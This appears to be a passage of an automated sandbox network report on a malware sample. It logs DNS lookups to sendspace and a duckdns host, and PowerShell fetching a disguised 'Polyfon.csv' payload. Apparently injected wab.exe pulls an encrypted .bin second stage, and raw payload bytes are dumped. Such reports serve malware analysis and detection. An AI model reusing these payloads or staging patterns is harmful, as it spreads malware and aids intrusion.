                                                                                    May 23, 2024 21:13:04.770529985 CEST53560781.1.1.1192.168.2.6

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    May 23, 2024 21:12:13.643240929 CEST192.168.2.61.1.1.10x91c0Standard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                                                    May 23, 2024 21:12:14.555010080 CEST192.168.2.61.1.1.10x561Standard query (0)fs03n4.sendspace.comA (IP address)IN (0x0001)false
                                                                                    May 23, 2024 21:12:55.433022976 CEST192.168.2.61.1.1.10xfd6aStandard query (0)fs03n1.sendspace.comA (IP address)IN (0x0001)false
                                                                                    May 23, 2024 21:13:04.662554979 CEST192.168.2.61.1.1.10xe6f5Standard query (0)tbsagyw.duckdns.orgA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    May 23, 2024 21:12:13.655230045 CEST1.1.1.1192.168.2.60x91c0No error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                                                    May 23, 2024 21:12:13.655230045 CEST1.1.1.1192.168.2.60x91c0No error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                                                    May 23, 2024 21:12:14.575926065 CEST1.1.1.1192.168.2.60x561No error (0)fs03n4.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                                    May 23, 2024 21:12:55.478770018 CEST1.1.1.1192.168.2.60xfd6aNo error (0)fs03n1.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                                    May 23, 2024 21:13:04.770529985 CEST1.1.1.1192.168.2.60xe6f5No error (0)tbsagyw.duckdns.org12.202.180.134A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.sendspace.com
                                                                                    • fs03n4.sendspace.com
                                                                                    • fs03n1.sendspace.com

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.649711104.21.28.804435092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-05-23 19:12:14 UTC174OUTGET /pro/dl/jj4uw4 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Host: www.sendspace.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-05-23 19:12:14 UTC945INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 23 May 2024 19:12:14 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: SID=4ff7uuntpvdq5u7f4etmg61f61; path=/; domain=.sendspace.com
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    Pragma: no-cache
                                                                                    Location: https://fs03n4.sendspace.com/dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=viU8mnGWDz2vmdPWCtZ6CbWqTlfZjmOZnxCLqwGFZBMSeDwFpAmwBHpSHjyuwQtmdZ8%2BS0pM%2BRewNRJjLgV1Ke%2FbP5%2BLmzo0yP5AebmUGeyctlStT7tDZl%2FCq%2BFOPZ%2BYOALAjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 88875b39382917a9-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-05-23 19:12:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.64971269.31.136.174435092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-05-23 19:12:15 UTC230OUTGET /dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Host: fs03n4.sendspace.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-05-23 19:12:15 UTC496INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 23 May 2024 19:12:15 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 489216
                                                                                    Last-Modified: Fri, 17 May 2024 15:07:43 GMT
                                                                                    Connection: close
                                                                                    Set-Cookie: SID=8mrm2dc8u4e3mbvjaf2nnrj867; path=/; domain=.sendspace.com
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    Content-Disposition: attachment;filename="Polyfon.csv"
                                                                                    ETag: "664772bf-77700"
                                                                                    Accept-Ranges: bytes
                                                                                    2024-05-23 19:12:15 UTC15888INData Raw: 63 51 47 62 63 51 47 62 75 78 39 43 44 67 44 72 41 6b 4b 48 36 77 49 32 75 41 4e 63 4a 41 52 78 41 5a 76 72 41 74 6b 4b 75 62 62 6a 65 4d 6a 72 41 67 52 45 36 77 4a 58 5a 34 48 70 67 36 41 41 44 75 73 43 4a 54 48 72 41 70 67 4e 67 66 45 7a 51 33 69 36 63 51 47 62 36 77 4a 51 54 65 73 43 77 55 66 72 41 73 55 33 75 6e 48 4d 52 59 37 72 41 6e 6a 6c 36 77 49 36 73 65 73 43 30 6c 42 78 41 5a 73 78 79 75 73 43 64 71 6a 72 41 74 73 6b 69 52 51 4c 36 77 49 39 4c 65 73 43 6e 77 72 52 34 75 73 43 45 38 7a 72 41 73 51 49 67 38 45 45 36 77 4c 6e 6c 33 45 42 6d 34 48 35 6f 58 43 4a 41 33 7a 49 63 51 47 62 63 51 47 62 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 63 51 47 62 36 77 4c 48 33 34 48 44 75 6e 74 5a 41 65 73 43 4f 53 56 78 41 5a 75 36 42 47 50 6c 44 6e 45
                                                                                    Data Ascii: cQGbcQGbux9CDgDrAkKH6wI2uANcJARxAZvrAtkKubbjeMjrAgRE6wJXZ4Hpg6AADusCJTHrApgNgfEzQ3i6cQGb6wJQTesCwUfrAsU3unHMRY7rAnjl6wI6sesC0lBxAZsxyusCdqjrAtskiRQL6wI9LesCnwrR4usCE8zrAsQIg8EE6wLnl3EBm4H5oXCJA3zIcQGbcQGbi0QkBHEBm3EBm4nDcQGb6wLH34HDuntZAesCOSVxAZu6BGPlDnE
                                                                                    2024-05-23 19:12:15 UTC16384INData Raw: 53 32 37 36 68 49 78 4c 73 4c 47 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 6d 57 42 49 71 6e 4e 70 44 35 59 77 35 46 41 68 31 67 6a 32 32 74 47 44 53 2f 5a 74 62 67 43 62 4a 77 4b 39 70 33 7a 50 32 43 45 56 4d 34 6f 42 46 67 4b 39 49 67 4f 65 47 53 45 6c 76 74 6d 6b 72 41 70 64 41 70 4e 33 33 67 54 58 36 54 31 56 64 4c 50 63 67 61 55 41 79 4f 6f 62 76 59 76 45 4d 78 79 76 44 4e 58 49 74 54 2b 39 4c 67 61 62 6d 50 62 6c 55 6e 38 70 37 4d 48 4a 31 73 47 4e 6c 57 73 56 53 45 46 4e 54 36 44 63 67 6c 77 39 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 2b 34 67 71 70 62 4f 41 74 59 43 38 72 67 73 75 46 44
                                                                                    Data Ascii: S276hIxLsLGDS6DTg0ug04NLoNODS6DTg0ug04NLoNODS6DTg0ugmWBIqnNpD5Yw5FAh1gj22tGDS/ZtbgCbJwK9p3zP2CEVM4oBFgK9IgOeGSElvtmkrApdApN33gTX6T1VdLPcgaUAyOobvYvEMxyvDNXItT+9LgabmPblUn8p7MHJ1sGNlWsVSEFNT6Dcglw904NLoNODS6DTg0ug04NLoNODS6DTg0ug04NLoNODS+4gqpbOAtYC8rgsuFD
                                                                                    2024-05-23 19:12:15 UTC16384INData Raw: 4a 53 71 6f 36 34 46 62 69 61 78 58 7a 53 45 55 66 45 75 67 30 77 72 2b 39 74 47 44 53 79 6b 74 31 63 41 56 68 59 46 4c 6f 44 74 7a 39 36 54 54 33 55 53 68 49 69 70 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 79 6c 67 69 48 7a 57 2b 4d 6c 66 58 75 4b 62 4f 68 2f 59 73 2f 4c 37 4b 53 74 34 6a 52 43 51 70 51 6b 2b 67 37 6a 2f 59 70 46 61 4d 7a 30 38 53 68 30 75 64 4f 79 35 5a 32 39 77 48 72 32 48 58 67 33 59 4c 49 54 4a 38 72 31 64 61 69 71 54 54 30 66 46 50 42 38 54 41 49 53 47 62 73 31 45 57 41 6f 6c 50 47 46 6a 30 49 53 47 63 49 4e 67 74 41 6f 6c 53 6d 4a 52 45 4b 64 6e 36 5a 58 35 69 4c 37 61 62 4c 44 2f 51 31 45 74 55 47 6e 42 31 61 73 71 38 6e 42 75 76 4a 4e 71 6e 79 49 69
                                                                                    Data Ascii: JSqo64FbiaxXzSEUfEug0wr+9tGDSykt1cAVhYFLoDtz96TT3UShIipLoNODS6DTg0ug04NLoNODS6DTg0ug04NLoNODS6DTylgiHzW+MlfXuKbOh/Ys/L7KSt4jRCQpQk+g7j/YpFaMz08Sh0udOy5Z29wHr2HXg3YLITJ8r1daiqTT0fFPB8TAISGbs1EWAolPGFj0ISGcINgtAolSmJREKdn6ZX5iL7abLD/Q1EtUGnB1asq8nBuvJNqnyIi
                                                                                    2024-05-23 19:12:15 UTC16384INData Raw: 65 37 72 63 66 49 66 75 2f 6b 7a 6e 45 6d 65 51 69 34 6f 6e 68 62 36 48 6a 65 68 41 4c 55 65 51 66 6c 4a 6e 2b 42 61 4d 44 57 74 70 57 5a 66 41 36 74 76 34 46 77 4d 63 7a 6f 6a 6f 6b 53 47 49 4a 35 4f 43 6d 74 79 6d 38 47 74 41 7a 46 71 6f 74 70 69 37 45 74 64 2b 30 4b 63 4c 47 49 33 6d 45 73 43 57 35 71 36 69 69 4a 55 4b 53 7a 69 66 74 39 73 77 5a 6f 71 6f 32 77 4c 33 64 4e 6e 5a 63 35 6f 4a 51 52 66 73 73 48 43 4f 34 71 45 32 76 69 33 65 65 4d 76 64 64 49 62 59 74 41 43 72 58 7a 46 32 78 53 39 69 2f 49 73 43 4f 4b 67 62 74 33 76 66 55 76 42 44 78 41 49 56 2f 79 47 51 69 39 67 39 33 49 6f 59 47 33 69 2b 5a 34 4a 53 63 4d 4b 54 69 68 54 4b 53 2f 47 4f 50 68 57 46 48 38 4a 47 30 70 33 57 4a 51 58 33 55 53 7a 35 68 4b 58 73 73 4f 54 59 32 47 53 36 68 6f 33
                                                                                    Data Ascii: e7rcfIfu/kznEmeQi4onhb6HjehALUeQflJn+BaMDWtpWZfA6tv4FwMczojokSGIJ5OCmtym8GtAzFqotpi7Etd+0KcLGI3mEsCW5q6iiJUKSzift9swZoqo2wL3dNnZc5oJQRfssHCO4qE2vi3eeMvddIbYtACrXzF2xS9i/IsCOKgbt3vfUvBDxAIV/yGQi9g93IoYG3i+Z4JScMKTihTKS/GOPhWFH8JG0p3WJQX3USz5hKXssOTY2GS6ho3
                                                                                    2024-05-23 19:12:15 UTC16384INData Raw: 43 71 79 70 31 42 37 4f 56 71 47 51 72 39 6f 4c 6c 68 49 65 41 34 4d 50 78 69 71 2f 44 69 50 68 62 6d 6d 72 44 57 48 52 2f 41 34 35 30 54 49 42 7a 56 72 2f 45 54 6f 67 36 53 2f 38 75 2f 6f 71 52 68 44 59 54 63 6a 48 31 38 47 4d 41 69 55 52 33 4d 35 72 69 33 7a 2b 57 4e 4f 44 53 31 2b 6d 36 36 4f 44 2b 49 64 4c 72 39 4b 51 34 71 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4d 62 34 50 64 64 5a 30 70 43 66 50 35 59 30 34 4e 4c 53 46 61 74 54 36 42 59 42 72 4f 67 30 34 4e 4b 61 42 57 44 5a 47 7a 4f 43 51 59 47 7a 49 37 45 62 61 4a 51 62 44 69 4f 58 36 6e 46 41 5a 56 74 4f 69 66 6f 31 6b 5a 31 59 53 7a 68 30 4c 32 50 43 2f 61 58 41 45 51 34 79 42 62 75 6e 42 79 45 35 6b 4e 78 6b 6b 78
                                                                                    Data Ascii: Cqyp1B7OVqGQr9oLlhIeA4MPxiq/DiPhbmmrDWHR/A450TIBzVr/ETog6S/8u/oqRhDYTcjH18GMAiUR3M5ri3z+WNODS1+m66OD+IdLr9KQ4qDTg0ug04NLoNODS6DTg0ug04NLoNODS6DTg0ug04Mb4PddZ0pCfP5Y04NLSFatT6BYBrOg04NKaBWDZGzOCQYGzI7EbaJQbDiOX6nFAZVtOifo1kZ1YSzh0L2PC/aXAEQ4yBbunByE5kNxkkx
                                                                                    2024-05-23 19:12:15 UTC16384INData Raw: 4f 64 55 6b 37 37 6f 74 6d 52 49 43 75 55 36 41 78 69 41 6b 43 67 4b 35 77 38 75 59 66 69 55 4a 41 72 6d 33 48 4f 45 73 6d 41 71 43 6d 69 74 47 49 30 71 67 30 33 57 50 61 68 53 43 74 45 57 6a 48 63 35 7a 55 6f 4a 34 37 2f 44 76 79 6f 6e 71 2b 48 57 48 55 6f 49 37 4d 63 57 57 77 68 30 34 67 6b 75 67 62 43 44 35 51 4c 6b 48 6d 69 45 6b 58 48 2f 46 57 4c 71 44 78 6c 5a 54 79 6c 64 7a 72 4d 77 62 55 6d 79 54 43 64 48 5a 53 6c 6c 59 50 71 43 68 30 34 4f 4d 6f 59 47 72 2b 34 4e 53 71 75 6f 44 6c 48 54 4b 6b 61 6d 62 4a 55 35 58 55 63 71 4a 4b 76 50 52 64 42 51 47 65 61 4c 54 67 37 49 49 76 6a 35 7a 61 75 74 51 79 69 58 68 67 55 75 67 6f 68 77 6d 71 79 56 47 56 69 46 2b 73 55 6d 67 30 79 6b 42 4e 58 51 43 7a 70 4c 52 67 30 76 6a 30 54 6d 56 78 6e 71 4d 6b 4f 45
                                                                                    Data Ascii: OdUk77otmRICuU6AxiAkCgK5w8uYfiUJArm3HOEsmAqCmitGI0qg03WPahSCtEWjHc5zUoJ47/Dvyonq+HWHUoI7McWWwh04gkugbCD5QLkHmiEkXH/FWLqDxlZTyldzrMwbUmyTCdHZSllYPqCh04OMoYGr+4NSquoDlHTKkambJU5XUcqJKvPRdBQGeaLTg7IIvj5zautQyiXhgUugohwmqyVGViF+sUmg0ykBNXQCzpLRg0vj0TmVxnqMkOE
                                                                                    2024-05-23 19:12:15 UTC16384INData Raw: 75 72 6b 35 4f 62 75 33 47 57 39 4e 48 4d 76 72 5a 73 70 4a 34 62 31 67 70 56 4a 43 67 6c 37 44 65 73 70 52 49 49 70 33 2f 2b 74 41 77 68 32 53 67 55 75 67 57 6b 77 74 49 53 6f 76 43 2f 64 59 50 67 71 69 30 34 50 4f 65 6a 75 5a 53 71 44 54 30 66 45 38 62 51 4a 4c 49 79 6e 48 52 43 54 41 68 30 2b 67 69 64 72 43 4a 58 47 43 53 36 42 72 6b 78 30 34 76 51 65 61 6a 64 65 4d 2f 76 53 31 75 6f 47 6c 39 31 64 48 56 75 61 43 55 46 44 63 75 6f 6b 72 56 69 46 4b 6f 4e 50 38 51 63 62 71 51 73 67 6c 54 34 4e 4c 6f 4e 4b 43 6e 43 51 31 79 73 49 64 5a 6f 4a 4c 6f 46 4a 34 6f 61 62 5a 70 2f 52 37 38 48 48 5a 6d 43 34 43 76 47 76 33 79 2f 51 68 4a 44 44 78 62 4a 30 43 4e 74 43 74 47 55 75 67 33 41 64 58 70 64 65 44 4c 5a 6b 5a 41 6f 7a 39 6b 51 72 58 6d 43 32 36 73 69 74
                                                                                    Data Ascii: urk5Obu3GW9NHMvrZspJ4b1gpVJCgl7DespRIIp3/+tAwh2SgUugWkwtISovC/dYPgqi04POejuZSqDT0fE8bQJLIynHRCTAh0+gidrCJXGCS6Brkx04vQeajdeM/vS1uoGl91dHVuaCUFDcuokrViFKoNP8QcbqQsglT4NLoNKCnCQ1ysIdZoJLoFJ4oabZp/R78HHZmC4CvGv3y/QhJDDxbJ0CNtCtGUug3AdXpdeDLZkZAoz9kQrXmC26sit
                                                                                    2024-05-23 19:12:15 UTC16384INData Raw: 43 41 75 73 33 49 4a 38 66 74 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 75 67 30 34 4e 4c 6f 4e 4f 44 53 36 44 54 67 30 76 30 30 31 68 5a 70 45 49 43 31 67 6c 4c 6d 63 41 76 32 34 74 4c 6f 46 72 4c 61 32 79 70 38 52 4c 50 75 44 71 79 6f 65 41 4a 65 76 30 36 68 30 57 2b 4c 31 39 6f 62 45 44 36 4b 6b 50 72 47 67 4a 67 77 45 45 44 52 70 6e 46 46 4b 42 59 4e 45 75 6f 30 34 50 43 30 4d 76 52 38 59 4b 64 44 72 77 68 49 61 37 42 75 42 4d 43 75 62 64 4d 62 79 4d 68 49 65 36 61 30 68 51 43 69 63 43 6f 64 79 77 70 79 62 4c 35 4c 62 4d 61 41 47 30 45 73 51 2f 33 38 62 44 49 4f 65 74 36 7a 39 70 4f 73 50 5a 51 30 35 51 72 30 66 59 30 6b 76 6f 75 78 67 51 35 76 63 63 56 33 52 57 51 33 6f 43 59 4f 64 6b 61 2f 36 4a 73 36 6f 6d 41 2f 50 44
                                                                                    Data Ascii: CAus3IJ8ftODS6DTg0ug04NLoNODS6DTg0ug04NLoNODS6DTg0v001hZpEIC1glLmcAv24tLoFrLa2yp8RLPuDqyoeAJev06h0W+L19obED6KkPrGgJgwEEDRpnFFKBYNEuo04PC0MvR8YKdDrwhIa7BuBMCubdMbyMhIe6a0hQCicCodywpybL5LbMaAG0EsQ/38bDIOet6z9pOsPZQ05Qr0fY0kvouxgQ5vccV3RWQ3oCYOdka/6Js6omA/PD
                                                                                    2024-05-23 19:12:15 UTC16384INData Raw: 4b 55 71 67 30 2f 61 38 34 49 4d 37 39 70 42 7a 6e 48 5a 39 30 34 4e 4c 72 31 66 46 37 36 50 54 32 38 4b 6f 31 74 6d 53 70 39 4b 75 48 58 6e 55 67 69 31 6e 30 33 79 61 4a 42 67 4b 31 68 44 53 67 30 76 47 55 6e 7a 79 38 57 67 77 2b 4b 51 71 41 72 68 71 68 50 33 66 6d 52 45 43 75 47 69 30 6b 43 31 57 45 65 37 4b 59 34 4c 2f 33 56 53 31 42 6f 47 68 43 77 6a 57 45 4e 4b 44 53 79 51 44 52 55 73 77 36 33 66 50 52 68 44 6c 76 47 4c 68 6a 72 63 6b 4e 62 75 6c 38 46 64 2b 7a 32 46 59 7a 32 2b 73 56 6b 44 41 35 50 65 4c 79 74 32 76 56 5a 79 67 30 34 7a 50 5a 75 46 38 74 43 51 52 79 69 32 5a 41 45 56 50 71 46 76 54 38 77 7a 5a 73 42 2b 64 43 6f 4e 4c 6f 4e 77 48 2f 67 50 51 67 78 4d 67 2f 34 73 36 49 53 71 6c 52 6f 61 4f 41 33 2b 6f 75 51 4e 50 71 46 43 37 72 73 5a
                                                                                    Data Ascii: KUqg0/a84IM79pBznHZ904NLr1fF76PT28Ko1tmSp9KuHXnUgi1n03yaJBgK1hDSg0vGUnzy8Wgw+KQqArhqhP3fmRECuGi0kC1WEe7KY4L/3VS1BoGhCwjWENKDSyQDRUsw63fPRhDlvGLhjrckNbul8Fd+z2FYz2+sVkDA5PeLyt2vVZyg04zPZuF8tCQRyi2ZAEVPqFvT8wzZsB+dCoNLoNwH/gPQgxMg/4s6ISqlRoaOA3+ouQNPqFC7rsZ
                                                                                    2024-05-23 19:12:15 UTC16384INData Raw: 62 6a 79 4d 68 54 30 36 2f 34 41 69 79 6b 36 6f 51 47 74 6d 55 6b 55 6c 50 45 5a 61 79 6d 5a 50 53 33 7a 72 67 78 2f 43 51 4e 71 7a 31 69 51 52 2f 6c 30 34 32 59 56 65 4b 32 39 49 61 74 73 50 59 4a 64 78 4e 50 61 78 62 73 67 33 64 4d 67 5a 69 74 36 65 62 4e 65 6e 39 49 63 72 75 4f 2b 5a 56 63 69 4b 53 43 4b 2f 4c 7a 59 45 48 45 68 52 75 70 6a 34 74 51 4b 30 51 35 4c 64 77 68 33 47 67 55 75 67 62 4f 57 54 34 44 67 43 70 4d 52 61 4d 37 45 68 50 41 39 58 33 39 45 43 6a 43 6f 65 62 56 72 33 57 44 35 65 6f 74 4f 44 77 6a 57 75 67 6b 75 67 61 56 2b 49 52 2b 38 43 75 51 77 4f 6c 4f 73 68 45 59 54 65 51 38 59 43 6f 64 64 67 55 50 6e 79 57 42 59 32 6f 64 4f 44 77 68 58 49 67 55 75 67 67 54 6b 5a 59 54 38 61 79 6c 4b 45 64 48 50 56 55 6b 46 42 55 4b 32 57 79 6d 49
                                                                                    Data Ascii: bjyMhT06/4Aiyk6oQGtmUkUlPEZaymZPS3zrgx/CQNqz1iQR/l042YVeK29IatsPYJdxNPaxbsg3dMgZit6ebNen9IcruO+ZVciKSCK/LzYEHEhRupj4tQK0Q5Ldwh3GgUugbOWT4DgCpMRaM7EhPA9X39ECjCoebVr3WD5eotODwjWugkugaV+IR+8CuQwOlOshEYTeQ8YCoddgUPnyWBY2odODwhXIgUuggTkZYT8aylKEdHPVUkFBUK2WymI


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.649720104.21.28.804432948C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-05-23 19:12:55 UTC175OUTGET /pro/dl/ug8lu5 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Host: www.sendspace.com
                                                                                    Cache-Control: no-cache
                                                                                    2024-05-23 19:12:55 UTC968INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 23 May 2024 19:12:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: SID=o97eha0u97md48nbbdbvhl8653; path=/; domain=.sendspace.com
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    Pragma: no-cache
                                                                                    Location: https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmzxfnCWYZjyWM4SpGhLbbuJjb7olGlu%2Byo8AN2ncZ4Ib%2FTTBo3zq02VZQApUbdX9%2Fvs1OfJnl%2FQK8dJ%2FCEbIIdFPMT0o%2F20JG9u9Z%2FzVQNvtkElhS%2FWfceupVDqC6MHCxzbBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 88875c38cba817b1-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-05-23 19:12:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.64972169.31.136.174432948C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-05-23 19:12:56 UTC316OUTGET /dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Cache-Control: no-cache
                                                                                    Host: fs03n1.sendspace.com
                                                                                    Connection: Keep-Alive
                                                                                    Cookie: SID=o97eha0u97md48nbbdbvhl8653
                                                                                    2024-05-23 19:12:56 UTC440INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 23 May 2024 19:12:56 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 36928
                                                                                    Last-Modified: Fri, 17 May 2024 15:06:46 GMT
                                                                                    Connection: close
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    Content-Disposition: attachment;filename="EwcTRqORRXkTdykugKGXjGVoR103.bin"
                                                                                    ETag: "66477286-9040"
                                                                                    Accept-Ranges: bytes
                                                                                    2024-05-23 19:12:56 UTC15944INData Raw: 3d 35 51 9e 72 8f 9f a4 8f 75 bb 68 ae 19 b5 5a 7f d8 b8 35 40 b4 5f 37 6b 2c d4 4c 13 7f eb a4 08 d1 d2 8b c8 8a 60 fa 6f 2d b0 05 35 57 b2 ad 48 af bf a3 e3 55 af a7 e6 da bb b6 1d b6 d1 f0 dc 74 f9 74 e8 02 6d 84 b2 25 9d 6d 52 e4 c9 2e e1 d9 34 c7 1b 3b f5 28 13 f5 ab 1e aa f3 73 ba 2f da 0e 5a 42 74 05 6c 82 7b 9e 19 61 c8 07 0e d6 6c 84 8c 75 74 08 b8 44 05 1f 8a fa 7d 8d 15 b7 4e d5 92 bc b0 7d 76 34 53 de a6 88 47 b8 5f 8f b2 cd 38 d7 15 61 d2 51 ca 81 91 ec f5 b5 08 23 32 b4 2f f3 7e d8 db fe a3 34 4a b7 f2 dd 86 a2 e6 7b 54 69 df 2d ee fd 14 cd 41 59 47 5d 18 63 36 c5 5e c8 31 26 b0 61 e4 f7 84 62 a7 97 3d 94 f2 3a ad c5 0c 3c 73 0d 54 be d1 bb 40 42 0e 98 20 21 47 78 73 b4 7b 3f 33 5c b4 f9 0d 6a 2e dd 22 ac 19 24 8e 74 ec 72 a4 50 82 20 05 31
                                                                                    Data Ascii: =5QruhZ5@_7k,L`o-5WHUttm%mR.4;(s/ZBtl{alutD}N}v4SG_8aQ#2/~4J{Ti-AYG]c6^1&ab=:<sT@B !Gxs{?3\j."$trP 1
                                                                                    2024-05-23 19:12:56 UTC16384INData Raw: dd e2 ac 19 37 86 d1 ed 30 84 51 82 dc 27 31 14 bb a7 48 92 a7 06 24 36 0d 60 d6 14 da 42 57 fe 76 d5 e2 d0 57 a2 ca a2 5c 03 62 67 32 f3 c3 59 a0 d7 8f 26 a4 90 6b 6a d4 77 69 71 ea 79 ad 50 66 0d b7 7a d2 50 6b d4 f4 2b 89 f6 c2 8f 41 6e 53 f3 d6 b9 4f f7 e9 99 54 f9 cb ee 96 e6 66 51 da 7b 02 4e 47 d5 a4 8c 9c 85 c0 08 bd 3e 14 8a 26 e0 54 ce 24 80 ea 8a 30 0b 41 94 d6 ed de 19 c8 25 6b d5 7b 04 16 c5 b0 c3 24 dd 85 e5 d5 a2 cd 72 6e 49 da 5e c2 2a 40 e9 71 6a 1a 09 ba 59 39 30 d2 c6 4e 03 11 b3 74 a3 63 0c 78 b5 c7 46 37 27 a1 46 36 af 3a a2 3c 83 20 18 60 cd f2 13 d3 60 a3 d1 ae 42 fa c2 f0 11 dc d5 3a e2 09 52 7a 00 44 4c a0 02 55 ce 88 80 74 23 74 3d a8 7b ed fb 1d 37 a3 e3 2f fd 4f 3a f9 ef bd 95 ed 75 37 37 c8 18 72 d2 e4 a8 14 9f 03 79 1e c9 5c
                                                                                    Data Ascii: 70Q'1H$6`BWvW\bg2Y&kjwiqyPfzPk+AnSOTfQ{NG>&T$0A%k{$rnI^*@qjY90NtcxF7'F6:< ``B:RzDLUt#t={7/O:u77ry\
